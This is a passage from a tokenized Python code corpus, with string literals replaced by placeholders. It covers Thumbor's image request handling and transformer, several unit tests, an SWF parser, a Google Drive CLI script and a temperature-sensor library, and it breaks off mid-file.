'<STR_LIT:utf-8>' ) ) <EOL> if not self . validate ( kw [ '<STR_LIT:image>' ] ) : <EOL> self . _error ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return <EOL> kw [ '<STR_LIT>' ] = self . request <EOL> self . context . request = RequestParameters ( ** kw ) <EOL> has_none = not self . context . request . unsafe and not self . context . request . hash <EOL> has_both = self . context . request . unsafe and self . context . request . hash <EOL> if has_none or has_both : <EOL> self . _error ( <NUM_LIT> , '<STR_LIT>' % url ) <EOL> return <EOL> if self . context . request . unsafe and not self . context . config . ALLOW_UNSAFE_URL : <EOL> self . _error ( <NUM_LIT> , '<STR_LIT>' % url ) <EOL> return <EOL> if self . context . config . USE_BLACKLIST : <EOL> blacklist = yield self . get_blacklist_contents ( ) <EOL> if self . context . request . image_url in blacklist : <EOL> self . _error ( <NUM_LIT> , '<STR_LIT>' % self . context . request . image_url ) <EOL> return <EOL> url_signature = self . context . request . 
hash <EOL> if url_signature : <EOL> signer = self . context . modules . url_signer ( self . context . server . security_key ) <EOL> url_to_validate = url . replace ( '<STR_LIT>' % self . context . request . hash , '<STR_LIT>' ) . replace ( '<STR_LIT>' % quote ( self . context . request . hash ) , '<STR_LIT>' ) <EOL> valid = signer . validate ( unquote ( url_signature ) , url_to_validate ) <EOL> if not valid and self . context . config . STORES_CRYPTO_KEY_FOR_EACH_IMAGE : <EOL> security_key = yield gen . maybe_future ( self . context . modules . storage . get_crypto ( self . context . request . image_url ) ) <EOL> if security_key is not None : <EOL> signer = self . context . modules . url_signer ( security_key ) <EOL> valid = signer . validate ( url_signature , url_to_validate ) <EOL> if not valid : <EOL> self . _error ( <NUM_LIT> , '<STR_LIT>' % url ) <EOL> return <EOL> self . execute_image_operations ( ) <EOL> @ tornado . web . asynchronous <EOL> def get ( self , ** kw ) : <EOL> self . check_image ( kw ) <EOL> @ tornado . web . asynchronous <EOL> def head ( self , ** kw ) : <EOL> self . check_image ( kw ) </s>
<s> import math <EOL> import sys <EOL> from thumbor . point import FocalPoint <EOL> from thumbor . utils import logger <EOL> import tornado . gen as gen <EOL> trim_enabled = True <EOL> try : <EOL> from thumbor . ext . filters import _bounding_box <EOL> except ImportError : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> trim_enabled = False <EOL> class Transformer ( object ) : <EOL> def __init__ ( self , context ) : <EOL> self . context = context <EOL> self . engine = self . context . request . engine <EOL> self . target_height = None <EOL> self . target_width = None <EOL> def _calculate_target_dimensions ( self ) : <EOL> source_width , source_height = self . engine . size <EOL> source_width = float ( source_width ) <EOL> source_height = float ( source_height ) <EOL> if not self . context . request . width and not self . context . request . height : <EOL> self . target_width = source_width <EOL> self . target_height = source_height <EOL> else : <EOL> if self . context . request . width : <EOL> if self . context . request . width == "<STR_LIT>" : <EOL> self . target_width = source_width <EOL> else : <EOL> self . target_width = float ( self . context . request . width ) <EOL> else : <EOL> self . target_width = self . engine . get_proportional_width ( self . context . request . height ) <EOL> if self . context . request . height : <EOL> if self . context . request . height == "<STR_LIT>" : <EOL> self . target_height = source_height <EOL> else : <EOL> self . target_height = float ( self . context . request . height ) <EOL> else : <EOL> self . target_height = self . engine . get_proportional_height ( self . context . request . width ) <EOL> def get_target_dimensions ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . target_height is None : <EOL> self . _calculate_target_dimensions ( ) <EOL> return int ( self . target_width ) , int ( self . target_height ) <EOL> def adjust_focal_points ( self ) : <EOL> source_width , source_height = self . engine . size <EOL> self . 
focal_points = None <EOL> if self . context . request . focal_points : <EOL> if self . context . request . should_crop : <EOL> self . focal_points = [ ] <EOL> crop = self . context . request . crop <EOL> for point in self . context . request . focal_points : <EOL> if point . x < crop [ '<STR_LIT:left>' ] or point . x > crop [ '<STR_LIT:right>' ] or point . y < crop [ '<STR_LIT>' ] or point . y > crop [ '<STR_LIT>' ] : <EOL> continue <EOL> point . x -= crop [ '<STR_LIT:left>' ] or <NUM_LIT:0> <EOL> point . y -= crop [ '<STR_LIT>' ] or <NUM_LIT:0> <EOL> self . focal_points . append ( point ) <EOL> else : <EOL> self . focal_points = self . context . request . focal_points <EOL> if not self . focal_points : <EOL> self . focal_points = [ <EOL> FocalPoint . from_alignment ( self . context . request . halign , <EOL> self . context . request . valign , <EOL> source_width , <EOL> source_height ) <EOL> ] <EOL> self . engine . focus ( self . focal_points ) <EOL> def transform ( self , callback ) : <EOL> self . done_callback = callback <EOL> if self . context . config . RESPECT_ORIENTATION : <EOL> self . engine . reorientate ( ) <EOL> self . trim ( ) <EOL> self . smart_detect ( ) <EOL> def trim ( self ) : <EOL> is_gifsicle = ( self . context . request . engine . extension == '<STR_LIT>' and self . context . config . USE_GIFSICLE_ENGINE ) <EOL> if self . context . request . trim is None or not trim_enabled or is_gifsicle : <EOL> return <EOL> mode , data = self . engine . image_data_as_rgb ( ) <EOL> box = _bounding_box . apply ( <EOL> mode , <EOL> self . engine . size [ <NUM_LIT:0> ] , <EOL> self . engine . size [ <NUM_LIT:1> ] , <EOL> self . context . request . trim_pos , <EOL> self . context . request . trim_tolerance , <EOL> data <EOL> ) <EOL> if box [ <NUM_LIT:2> ] < box [ <NUM_LIT:0> ] or box [ <NUM_LIT:3> ] < box [ <NUM_LIT:1> ] : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> return <EOL> self . engine . 
crop ( box [ <NUM_LIT:0> ] , box [ <NUM_LIT:1> ] , box [ <NUM_LIT:2> ] + <NUM_LIT:1> , box [ <NUM_LIT:3> ] + <NUM_LIT:1> ) <EOL> if self . context . request . should_crop : <EOL> self . context . request . crop [ '<STR_LIT:left>' ] -= box [ <NUM_LIT:0> ] <EOL> self . context . request . crop [ '<STR_LIT>' ] -= box [ <NUM_LIT:1> ] <EOL> self . context . request . crop [ '<STR_LIT:right>' ] -= box [ <NUM_LIT:0> ] <EOL> self . context . request . crop [ '<STR_LIT>' ] -= box [ <NUM_LIT:1> ] <EOL> @ property <EOL> def smart_storage_key ( self ) : <EOL> return self . context . request . image_url <EOL> def smart_detect ( self ) : <EOL> is_gifsicle = ( self . context . request . engine . extension == '<STR_LIT>' and self . context . config . USE_GIFSICLE_ENGINE ) <EOL> if ( not ( self . context . modules . detectors and self . context . request . smart ) ) or is_gifsicle : <EOL> self . do_image_operations ( ) <EOL> return <EOL> try : <EOL> self . should_run_image_operations = False <EOL> self . running_smart_detection = True <EOL> self . do_smart_detection ( ) . result ( ) <EOL> self . running_smart_detection = False <EOL> except Exception : <EOL> if not self . context . config . IGNORE_SMART_ERRORS : <EOL> raise <EOL> logger . exception ( "<STR_LIT>" ) <EOL> if self . context . config . USE_CUSTOM_ERROR_HANDLING : <EOL> self . context . modules . importer . error_handler . handle_error ( <EOL> context = self . context , <EOL> handler = self . context . request_handler , <EOL> exception = sys . exc_info ( ) <EOL> ) <EOL> self . context . request . prevent_result_storage = True <EOL> self . context . request . detection_error = True <EOL> self . do_image_operations ( ) <EOL> if self . should_run_image_operations : <EOL> self . do_image_operations ( ) <EOL> @ gen . coroutine <EOL> def do_smart_detection ( self ) : <EOL> focal_points = yield gen . maybe_future ( self . context . modules . storage . get_detector_data ( self . 
smart_storage_key ) ) <EOL> if focal_points is not None : <EOL> self . after_smart_detect ( focal_points , points_from_storage = True ) <EOL> else : <EOL> detectors = self . context . modules . detectors <EOL> detectors [ <NUM_LIT:0> ] ( self . context , index = <NUM_LIT:0> , detectors = detectors ) . detect ( self . after_smart_detect ) <EOL> def after_smart_detect ( self , focal_points = [ ] , points_from_storage = False ) : <EOL> for point in focal_points : <EOL> self . context . request . focal_points . append ( FocalPoint . from_dict ( point ) ) <EOL> if self . context . request . focal_points and self . context . modules . storage and not points_from_storage : <EOL> storage = self . context . modules . storage <EOL> points = [ ] <EOL> for point in self . context . request . focal_points : <EOL> points . append ( point . to_dict ( ) ) <EOL> storage . put_detector_data ( self . smart_storage_key , points ) <EOL> if self . running_smart_detection : <EOL> self . should_run_image_operations = True <EOL> return <EOL> self . do_image_operations ( ) <EOL> def img_operation_worker ( self ) : <EOL> if '<STR_LIT>' == self . context . request . engine . extension and '<STR_LIT>' in self . context . request . filters : <EOL> self . extract_cover ( ) <EOL> self . manual_crop ( ) <EOL> self . _calculate_target_dimensions ( ) <EOL> self . adjust_focal_points ( ) <EOL> if self . context . request . debug : <EOL> self . debug ( ) <EOL> else : <EOL> if self . context . request . fit_in : <EOL> self . fit_in_resize ( ) <EOL> else : <EOL> self . auto_crop ( ) <EOL> self . resize ( ) <EOL> self . flip ( ) <EOL> def do_image_operations ( self ) : <EOL> """<STR_LIT>""" <EOL> def inner ( future ) : <EOL> self . done_callback ( ) <EOL> self . context . thread_pool . queue ( <EOL> operation = self . img_operation_worker , <EOL> callback = inner <EOL> ) <EOL> def extract_cover ( self ) : <EOL> self . engine . extract_cover ( ) <EOL> def manual_crop ( self ) : <EOL> if self . context . 
request . should_crop : <EOL> def limit ( dimension , maximum ) : <EOL> return min ( max ( dimension , <NUM_LIT:0> ) , maximum ) <EOL> source_width , source_height = self . engine . size <EOL> crop = self . context . request . crop <EOL> crop [ '<STR_LIT:left>' ] = limit ( crop [ '<STR_LIT:left>' ] , source_width ) <EOL> crop [ '<STR_LIT>' ] = limit ( crop [ '<STR_LIT>' ] , source_height ) <EOL> crop [ '<STR_LIT:right>' ] = limit ( crop [ '<STR_LIT:right>' ] , source_width ) <EOL> crop [ '<STR_LIT>' ] = limit ( crop [ '<STR_LIT>' ] , source_height ) <EOL> if crop [ '<STR_LIT:left>' ] >= crop [ '<STR_LIT:right>' ] or crop [ '<STR_LIT>' ] >= crop [ '<STR_LIT>' ] : <EOL> self . context . request . should_crop = False <EOL> crop [ '<STR_LIT:left>' ] = crop [ '<STR_LIT:right>' ] = crop [ '<STR_LIT>' ] = crop [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> return <EOL> self . engine . crop ( crop [ '<STR_LIT:left>' ] , crop [ '<STR_LIT>' ] , crop [ '<STR_LIT:right>' ] , crop [ '<STR_LIT>' ] ) <EOL> def auto_crop ( self ) : <EOL> source_width , source_height = self . engine . size <EOL> target_height = self . target_height or <NUM_LIT:1> <EOL> target_width = self . target_width or <NUM_LIT:1> <EOL> source_ratio = round ( float ( source_width ) / source_height , <NUM_LIT:2> ) <EOL> target_ratio = round ( float ( target_width ) / target_height , <NUM_LIT:2> ) <EOL> if source_ratio == target_ratio : <EOL> return <EOL> focal_x , focal_y = self . get_center_of_mass ( ) <EOL> if self . target_width / source_width > self . target_height / source_height : <EOL> crop_width = source_width <EOL> crop_height = int ( round ( source_width * self . target_height / target_width , <NUM_LIT:0> ) ) <EOL> else : <EOL> crop_width = int ( round ( math . ceil ( self . 
target_width * source_height / target_height ) , <NUM_LIT:0> ) ) <EOL> crop_height = source_height <EOL> crop_left = int ( round ( min ( max ( focal_x - ( crop_width / <NUM_LIT:2> ) , <NUM_LIT:0.0> ) , source_width - crop_width ) ) ) <EOL> crop_right = min ( crop_left + crop_width , source_width ) <EOL> crop_top = int ( round ( min ( max ( focal_y - ( crop_height / <NUM_LIT:2> ) , <NUM_LIT:0.0> ) , source_height - crop_height ) ) ) <EOL> crop_bottom = min ( crop_top + crop_height , source_height ) <EOL> self . engine . crop ( crop_left , crop_top , crop_right , crop_bottom ) <EOL> def flip ( self ) : <EOL> if self . context . request . horizontal_flip : <EOL> self . engine . flip_horizontally ( ) <EOL> if self . context . request . vertical_flip : <EOL> self . engine . flip_vertically ( ) <EOL> def get_center_of_mass ( self ) : <EOL> total_weight = <NUM_LIT:0.0> <EOL> total_x = <NUM_LIT:0.0> <EOL> total_y = <NUM_LIT:0.0> <EOL> for focal_point in self . focal_points : <EOL> total_weight += focal_point . weight <EOL> total_x += focal_point . x * focal_point . weight <EOL> total_y += focal_point . y * focal_point . weight <EOL> x = total_x / total_weight <EOL> y = total_y / total_weight <EOL> return x , y <EOL> def resize ( self ) : <EOL> source_width , source_height = self . engine . size <EOL> if self . target_width == source_width and self . target_height == source_height : <EOL> return <EOL> self . engine . resize ( self . target_width or <NUM_LIT:1> , self . target_height or <NUM_LIT:1> ) <EOL> def fit_in_resize ( self ) : <EOL> source_width , source_height = self . engine . size <EOL> if self . context . request . adaptive and ( <EOL> ( source_width - source_height < <NUM_LIT:0> and self . target_width - self . target_height > <NUM_LIT:0> ) or <EOL> ( source_width - source_height > <NUM_LIT:0> and self . target_width - self . target_height < <NUM_LIT:0> ) <EOL> ) : <EOL> tmp = self . context . request . width <EOL> self . context . request . width = self . 
context . request . height <EOL> self . context . request . height = tmp <EOL> tmp = self . target_width <EOL> self . target_width = self . target_height <EOL> self . target_height = tmp <EOL> sign = <NUM_LIT:1> <EOL> if self . context . request . full : <EOL> sign = - <NUM_LIT:1> <EOL> if sign == <NUM_LIT:1> and self . target_width >= source_width and self . target_height >= source_height : <EOL> return <EOL> if source_width / self . target_width * sign >= source_height / self . target_height * sign : <EOL> resize_height = round ( source_height * self . target_width / source_width ) <EOL> resize_width = self . target_width <EOL> else : <EOL> resize_height = self . target_height <EOL> resize_width = round ( source_width * self . target_height / source_height ) <EOL> self . engine . resize ( resize_width , resize_height ) <EOL> def debug ( self ) : <EOL> if not self . context . request . focal_points : <EOL> return <EOL> for point in self . context . request . focal_points : <EOL> if point . width <= <NUM_LIT:1> : <EOL> point . width = <NUM_LIT:10> <EOL> if point . height <= <NUM_LIT:1> : <EOL> point . height = <NUM_LIT:10> <EOL> self . engine . draw_rectangle ( int ( point . x - ( point . width / <NUM_LIT:2> ) ) , <EOL> int ( point . y - ( point . height / <NUM_LIT:2> ) ) , <EOL> point . width , <EOL> point . height ) </s>
<s> from pyvows import Vows , expect <EOL> from thumbor . storages . no_storage import Storage as NoStorage <EOL> from fixtures . storage_fixture import IMAGE_URL , IMAGE_BYTES <EOL> @ Vows . batch <EOL> class NoStorageVows ( Vows . Context ) : <EOL> class CanStoreImage ( Vows . Context ) : <EOL> def topic ( self ) : <EOL> storage = NoStorage ( None ) <EOL> storage . put ( IMAGE_URL % <NUM_LIT:1> , IMAGE_BYTES ) <EOL> return storage . get ( IMAGE_URL % <NUM_LIT:1> ) <EOL> def should_be_null ( self , topic ) : <EOL> expect ( topic . result ( ) ) . to_be_null ( ) <EOL> class KnowsNoImages ( Vows . Context ) : <EOL> def topic ( self ) : <EOL> storage = NoStorage ( None ) <EOL> return storage . exists ( IMAGE_URL % <NUM_LIT:1> ) <EOL> def should_be_false ( self , topic ) : <EOL> expect ( topic . result ( ) ) . to_be_false ( ) <EOL> class RemovesImage ( Vows . Context ) : <EOL> def topic ( self ) : <EOL> storage = NoStorage ( None ) <EOL> return storage . remove ( IMAGE_URL % <NUM_LIT:1> ) <EOL> def should_be_null ( self , topic ) : <EOL> expect ( topic ) . to_be_null ( ) <EOL> class StoresCrypto ( Vows . Context ) : <EOL> def topic ( self ) : <EOL> storage = NoStorage ( None ) <EOL> storage . put_crypto ( IMAGE_URL % <NUM_LIT:2> ) <EOL> return storage . get_crypto ( IMAGE_URL % <NUM_LIT:2> ) <EOL> def should_be_null ( self , topic ) : <EOL> expect ( topic . result ( ) ) . to_be_null ( ) <EOL> class DetectorData ( Vows . Context ) : <EOL> def topic ( self ) : <EOL> storage = NoStorage ( None ) <EOL> storage . put_detector_data ( IMAGE_URL % <NUM_LIT:3> , "<STR_LIT>" ) <EOL> return storage . get_detector_data ( IMAGE_URL % <NUM_LIT:3> ) <EOL> def should_be_null ( self , topic ) : <EOL> expect ( topic . result ( ) ) . to_be_null ( ) </s>
<s> from cabu . exceptions import HeaderException <EOL> class Headers ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config ) : <EOL> self . driver_name = config [ '<STR_LIT>' ] <EOL> self . headers = config [ '<STR_LIT>' ] <EOL> def set_headers ( self , profile ) : <EOL> """<STR_LIT>""" <EOL> self . profile = profile <EOL> for header_key , header_value in self . headers . items ( ) : <EOL> self . profile = self . set_header ( header_key , header_value ) <EOL> return self . profile <EOL> def set_header ( self , header_key , header_value ) : <EOL> """<STR_LIT>""" <EOL> if self . driver_name == '<STR_LIT>' : <EOL> header_key = header_key . lower ( ) . replace ( '<STR_LIT:->' , '<STR_LIT>' ) <EOL> self . profile . set_preference ( '<STR_LIT>' % header_key , header_value ) <EOL> elif self . driver_name == '<STR_LIT>' : <EOL> self . profile [ "<STR_LIT>" % header_key ] = ( <EOL> header_value <EOL> ) <EOL> else : <EOL> raise HeaderException ( '<STR_LIT>' ) <EOL> return self . profile </s>
<s> import sys <EOL> import re <EOL> from gdcmdtools . base import BASE_INFO <EOL> from gdcmdtools . base import DEBUG_LEVEL <EOL> from gdcmdtools . get import GDGet <EOL> from gdcmdtools . get import export_format <EOL> import argparse <EOL> from argparse import RawTextHelpFormatter <EOL> from pprint import pprint <EOL> import logging <EOL> logger = logging . getLogger ( ) <EOL> __THIS_APP = '<STR_LIT>' <EOL> __THIS_DESCRIPTION = '<STR_LIT>' <EOL> __THIS_VERSION = BASE_INFO [ "<STR_LIT:version>" ] <EOL> def test ( ) : <EOL> assert True <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> arg_parser = argparse . ArgumentParser ( <EOL> description = '<STR_LIT>' % <EOL> ( __THIS_APP , <EOL> __THIS_VERSION , <EOL> __THIS_DESCRIPTION , <EOL> BASE_INFO [ "<STR_LIT>" ] , <EOL> BASE_INFO [ "<STR_LIT:description>" ] ) , <EOL> formatter_class = RawTextHelpFormatter ) <EOL> arg_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> help_export_format = "<STR_LIT:\n>" . join ( <EOL> [ <EOL> re . search ( <EOL> "<STR_LIT>" , <EOL> k ) . group ( <NUM_LIT:1> ) + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT:U+002CU+0020>" . join ( <EOL> export_format [ k ] ) for k in export_format . iterkeys ( ) ] ) <EOL> arg_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> required = False , <EOL> help = '<STR_LIT>' % <EOL> help_export_format ) <EOL> arg_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> arg_parser . add_argument ( '<STR_LIT>' , <EOL> choices = DEBUG_LEVEL , <EOL> default = DEBUG_LEVEL [ - <NUM_LIT:1> ] , <EOL> help = '<STR_LIT>' ) <EOL> args = arg_parser . parse_args ( ) <EOL> logger . setLevel ( getattr ( logging , args . debug . upper ( ) ) ) <EOL> logger . debug ( args ) <EOL> get = GDGet ( args . file_id , args . export_format , args . save_as ) <EOL> result = get . run ( ) <EOL> sys . exit ( <NUM_LIT:0> ) </s>
<s> from unittest import TestCase <EOL> import simplejson as S <EOL> class JSONTestObject : <EOL> pass <EOL> class RecursiveJSONEncoder ( S . JSONEncoder ) : <EOL> recurse = False <EOL> def default ( self , o ) : <EOL> if o is JSONTestObject : <EOL> if self . recurse : <EOL> return [ JSONTestObject ] <EOL> else : <EOL> return '<STR_LIT>' <EOL> return S . JSONEncoder . default ( o ) <EOL> class TestRecursion ( TestCase ) : <EOL> def test_listrecursion ( self ) : <EOL> x = [ ] <EOL> x . append ( x ) <EOL> try : <EOL> S . dumps ( x ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> x = [ ] <EOL> y = [ x ] <EOL> x . append ( y ) <EOL> try : <EOL> S . dumps ( x ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> y = [ ] <EOL> x = [ y , y ] <EOL> S . dumps ( x ) <EOL> def test_dictrecursion ( self ) : <EOL> x = { } <EOL> x [ "<STR_LIT:test>" ] = x <EOL> try : <EOL> S . dumps ( x ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> x = { } <EOL> y = { "<STR_LIT:a>" : x , "<STR_LIT:b>" : x } <EOL> S . dumps ( x ) <EOL> def test_defaultrecursion ( self ) : <EOL> enc = RecursiveJSONEncoder ( ) <EOL> self . assertEquals ( enc . encode ( JSONTestObject ) , '<STR_LIT>' ) <EOL> enc . recurse = True <EOL> try : <EOL> enc . encode ( JSONTestObject ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from . tag import SWFTimelineContainer <EOL> from . stream import SWFStream <EOL> from . export import SVGExporter <EOL> from six . moves import cStringIO <EOL> from io import BytesIO <EOL> class SWFHeaderException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message ) : <EOL> super ( SWFHeaderException , self ) . __init__ ( message ) <EOL> class SWFHeader ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream ) : <EOL> a = stream . readUI8 ( ) <EOL> b = stream . readUI8 ( ) <EOL> c = stream . readUI8 ( ) <EOL> if not a in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] or b != <NUM_LIT> or c != <NUM_LIT> : <EOL> raise SWFHeaderException ( "<STR_LIT>" ) <EOL> self . _compressed_zlib = ( a == <NUM_LIT> ) <EOL> self . _compressed_lzma = ( a == <NUM_LIT> ) <EOL> self . _version = stream . readUI8 ( ) <EOL> self . _file_length = stream . readUI32 ( ) <EOL> if not ( self . _compressed_zlib or self . _compressed_lzma ) : <EOL> self . _frame_size = stream . readRECT ( ) <EOL> self . _frame_rate = stream . readFIXED8 ( ) <EOL> self . _frame_count = stream . readUI16 ( ) <EOL> @ property <EOL> def frame_size ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _frame_size <EOL> @ property <EOL> def frame_rate ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _frame_rate <EOL> @ property <EOL> def frame_count ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _frame_count <EOL> @ property <EOL> def file_length ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _file_length <EOL> @ property <EOL> def version ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _version <EOL> @ property <EOL> def compressed ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _compressed_zlib or self . _compressed_lzma <EOL> @ property <EOL> def compressed_zlib ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . 
_compressed_zlib <EOL> @ property <EOL> def compressed_lzma ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _compressed_lzma <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" + "<STR_LIT>" % self . version + "<STR_LIT>" % self . file_length + "<STR_LIT>" % self . frame_size . __str__ ( ) + "<STR_LIT>" % self . frame_rate + "<STR_LIT>" % self . frame_count <EOL> class SWF ( SWFTimelineContainer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , file = None ) : <EOL> super ( SWF , self ) . __init__ ( ) <EOL> self . _data = None if file is None else SWFStream ( file ) <EOL> self . _header = None <EOL> if self . _data is not None : <EOL> self . parse ( self . _data ) <EOL> @ property <EOL> def data ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _data <EOL> @ property <EOL> def header ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _header <EOL> def export ( self , exporter = None , force_stroke = False ) : <EOL> """<STR_LIT>""" <EOL> exporter = SVGExporter ( ) if exporter is None else exporter <EOL> if self . _data is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if len ( self . tags ) == <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return exporter . export ( self , force_stroke ) <EOL> def parse_file ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> self . parse ( open ( filename , '<STR_LIT:rb>' ) ) <EOL> def parse ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . _data = data = data if isinstance ( data , SWFStream ) else SWFStream ( data ) <EOL> self . _header = SWFHeader ( self . _data ) <EOL> if self . _header . compressed : <EOL> temp = BytesIO ( ) <EOL> if self . _header . compressed_zlib : <EOL> import zlib <EOL> data = data . f . read ( ) <EOL> zip = zlib . decompressobj ( ) <EOL> temp . write ( zip . decompress ( data ) ) <EOL> else : <EOL> import pylzma <EOL> data . readUI32 ( ) <EOL> data = data . f . read ( ) <EOL> temp . write ( pylzma . decompress ( data ) ) <EOL> temp . 
seek ( <NUM_LIT:0> ) <EOL> data = SWFStream ( temp ) <EOL> self . _header . _frame_size = data . readRECT ( ) <EOL> self . _header . _frame_rate = data . readFIXED8 ( ) <EOL> self . _header . _frame_count = data . readUI16 ( ) <EOL> self . parse_tags ( data ) <EOL> def __str__ ( self ) : <EOL> s = "<STR_LIT>" <EOL> s += self . _header . __str__ ( ) <EOL> for tag in self . tags : <EOL> s += tag . __str__ ( ) + "<STR_LIT:\n>" <EOL> return s </s>
<s> """<STR_LIT>""" <EOL> from os import path , listdir , system <EOL> from time import sleep <EOL> class W1ThermSensorError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class KernelModuleLoadError ( W1ThermSensorError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( KernelModuleLoadError , self ) . __init__ ( "<STR_LIT>" ) <EOL> class NoSensorFoundError ( W1ThermSensorError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , sensor_type , sensor_id ) : <EOL> super ( NoSensorFoundError , self ) . __init__ ( <EOL> "<STR_LIT>" . format ( <EOL> W1ThermSensor . TYPE_NAMES . get ( sensor_type , "<STR_LIT>" ) , sensor_id ) ) <EOL> class SensorNotReadyError ( W1ThermSensorError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( SensorNotReadyError , self ) . __init__ ( "<STR_LIT>" ) <EOL> class UnsupportedUnitError ( W1ThermSensorError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( UnsupportedUnitError , self ) . __init__ ( "<STR_LIT>" ) <EOL> class W1ThermSensor ( object ) : <EOL> """<STR_LIT>""" <EOL> THERM_SENSOR_DS18S20 = <NUM_LIT> <EOL> THERM_SENSOR_DS1822 = <NUM_LIT> <EOL> THERM_SENSOR_DS18B20 = <NUM_LIT> <EOL> THERM_SENSOR_DS1825 = <NUM_LIT> <EOL> THERM_SENSOR_DS28EA00 = <NUM_LIT> <EOL> THERM_SENSOR_MAX31850K = <NUM_LIT> <EOL> ALL_TYPES = [ <EOL> THERM_SENSOR_DS18S20 , THERM_SENSOR_DS1822 , THERM_SENSOR_DS18B20 , <EOL> THERM_SENSOR_DS1825 , THERM_SENSOR_DS28EA00 , THERM_SENSOR_MAX31850K <EOL> ] <EOL> DEGREES_C = <NUM_LIT> <EOL> DEGREES_F = <NUM_LIT> <EOL> KELVIN = <NUM_LIT> <EOL> BASE_DIRECTORY = "<STR_LIT>" <EOL> SLAVE_FILE = "<STR_LIT>" <EOL> UNIT_FACTORS = { <EOL> DEGREES_C : lambda x : x * <NUM_LIT> , <EOL> DEGREES_F : lambda x : x * <NUM_LIT> * <NUM_LIT> + <NUM_LIT> , <EOL> KELVIN : lambda x : x * <NUM_LIT> + <NUM_LIT> <EOL> } <EOL> UNIT_FACTOR_NAMES = { <EOL> "<STR_LIT>" : DEGREES_C , <EOL> "<STR_LIT>" : DEGREES_F , <EOL> "<STR_LIT>" : KELVIN <EOL> } <EOL> TYPE_NAMES = { <EOL> 
THERM_SENSOR_DS18S20 : "<STR_LIT>" , THERM_SENSOR_DS1822 : "<STR_LIT>" , THERM_SENSOR_DS18B20 : "<STR_LIT>" , <EOL> THERM_SENSOR_DS1825 : "<STR_LIT>" , THERM_SENSOR_DS28EA00 : "<STR_LIT>" , THERM_SENSOR_MAX31850K : "<STR_LIT>" <EOL> } <EOL> RESOLVE_TYPE_STR = { <EOL> "<STR_LIT>" : THERM_SENSOR_DS18S20 , "<STR_LIT>" : THERM_SENSOR_DS1822 , "<STR_LIT>" : THERM_SENSOR_DS18B20 , <EOL> "<STR_LIT>" : THERM_SENSOR_DS28EA00 , "<STR_LIT>" : THERM_SENSOR_MAX31850K <EOL> } <EOL> RETRY_ATTEMPTS = <NUM_LIT:10> <EOL> RETRY_DELAY_SECONDS = <NUM_LIT:1.0> / float ( RETRY_ATTEMPTS ) <EOL> @ classmethod <EOL> def get_available_sensors ( cls , types = None ) : <EOL> """<STR_LIT>""" <EOL> if not types : <EOL> types = cls . ALL_TYPES <EOL> is_sensor = lambda s : any ( s . startswith ( hex ( x ) [ <NUM_LIT:2> : ] ) for x in types ) <EOL> return [ cls ( cls . RESOLVE_TYPE_STR [ s [ : <NUM_LIT:2> ] ] , s [ <NUM_LIT:3> : ] ) for s in listdir ( cls . BASE_DIRECTORY ) if is_sensor ( s ) ] <EOL> def __init__ ( self , sensor_type = None , sensor_id = None ) : <EOL> """<STR_LIT>""" <EOL> self . _load_kernel_modules ( ) <EOL> self . type = sensor_type <EOL> self . id = sensor_id <EOL> if not sensor_type and not sensor_id : <EOL> for _ in range ( self . RETRY_ATTEMPTS ) : <EOL> s = self . get_available_sensors ( ) <EOL> if s : <EOL> self . type , self . id = s [ <NUM_LIT:0> ] . type , s [ <NUM_LIT:0> ] . id <EOL> break <EOL> sleep ( self . RETRY_DELAY_SECONDS ) <EOL> else : <EOL> raise NoSensorFoundError ( None , "<STR_LIT>" ) <EOL> elif not sensor_id : <EOL> s = self . get_available_sensors ( [ sensor_type ] ) <EOL> if not s : <EOL> raise NoSensorFoundError ( sensor_type , "<STR_LIT>" ) <EOL> self . id = s [ <NUM_LIT:0> ] . id <EOL> self . sensorpath = path . join ( self . BASE_DIRECTORY , self . slave_prefix + self . id , self . SLAVE_FILE ) <EOL> if not self . exists ( 